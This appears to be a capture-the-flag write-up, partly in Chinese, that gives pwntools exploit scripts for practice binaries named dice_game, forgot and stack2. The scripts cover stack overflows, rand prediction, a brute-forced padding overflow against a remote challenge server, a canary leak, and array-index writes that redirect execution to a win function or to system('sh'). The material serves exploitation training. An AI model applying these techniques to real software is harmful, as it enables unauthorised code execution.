from pwn import * from ctypes import * context.log_level = 'debug' libc = CDLL('libc.so.6') p = process('dice_game') p.sendlineafter('let me know your name:','A'*0x40+p64(0)) for i in range(50): randvalue = libc.rand(0)%6+1 p.sendlineafter('Give me the point(1~6):',str(randvalue)) p.interactive()
from pwn import * # context.log_level = 'debug' end_flag = 0# when the flag got,the end_flag => 1 ,means the loop ends for i in range(70,100): if end_flag==1: break log.info('testing padding = '+str(i)) p = remote('111.198.29.45',30599) p.recvuntil('WOW:') vuln_addr = int(p.recvline()[:-1],16) p.sendlineafter('>','A'*i+p64(vuln_addr)) try: flag = p.recvline() print(flag) end_flag = 1 except: pass p.close()
from pwn import * context.log_level = 'debug' p = process('./forgot') padding = 0x68 getflag_addr = 0x080486CC p.sendlineafter('name?','wh4lter') p.sendlineafter('Enter the string to be validate','A'*0x1c+p32(getflag_addr)+'A'*0x48+p32(10)) p.interactive()
0x03 stack2
分析
开了Canary,第一反应想办法爆出Canary
看IDA,自带了一个hackhere函数,那很显然,改EIP指向它就行了
这里可以通过给的change number功能修改栈中数据
1 2 3 4 5
puts("which number to change:"); __isoc99_scanf("%d", &count); puts("new number:"); __isoc99_scanf("%d", &number); v13[count] = number;
puts("***********************************************************"); puts("* An easy calc *"); puts("*Give me your numbers and I will return to you an average *"); puts("*(0 <= x < 256) *"); puts("***********************************************************"); puts("How many numbers you have:"); __isoc99_scanf("%d", &count); puts("Give me your numbers"); for ( i = 0; i < count && (signedint)i <= 99; ++i ) { __isoc99_scanf("%d", &number); v13[i] = number; } ... for ( j = count; ; printf("average is %.2lf\n", (double)((longdouble)v9 / (double)j)) ) ... puts("id\t\tnumber"); for ( k = 0; k < j; ++k ) printf("%d\t\t%d\n", k, v13[k]); ...
p.sendlineafter('have:',str(255))#我甚至老实地小于了256 for i in range(100): p.sendline(str(1))
p.sendlineafter('exit\n','1')
#get canary canary = '' for i in range(100,104): p.recvuntil(str(i)+'\t\t') value = int(p.recvuntil('\n')[:-1]) if value < 0: value = 256+value canary = hex(value)[2:].rjust(2,'0')+canary canary = int(canary,16) success('canary:'+hex(canary))
ret2hackhere
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
from pwn import * context.log_level = 'debug' p = process('stack2') p.sendlineafter('have:',str(1)) for i in range(1): p.sendline(str(1))
hackhere_addr = 0x0804859b for i in range(0x84,0x84+4): p.sendlineafter('exit\n','3') new_number = hackhere_addr & 0xFF hackhere_addr = hackhere_addr >> 8 p.sendlineafter('which number to change:\n',str(i)) p.sendlineafter('new number:\n',str(new_number))
from pwn import * context.log_level = 'debug' p = process('stack2')
p.sendlineafter('have:',str(1)) for i in range(1): p.sendline(str(1))
system_plt = 0x08048450 for i in range(0x84,0x84+4): p.sendlineafter('exit\n','3') new_number = system_plt & 0xFF system_plt = system_plt >> 8 p.sendlineafter('which number to change:\n',str(i)) p.sendlineafter('new number:\n',str(new_number))
sh_addr = 0x08048987 for i in range(0x84+8,0x84+12): p.sendlineafter('exit\n','3') new_number = sh_addr & 0xFF sh_addr = sh_addr >> 8 p.sendlineafter('which number to change:\n',str(i)) p.sendlineafter('new number:\n',str(new_number)) p.interactive()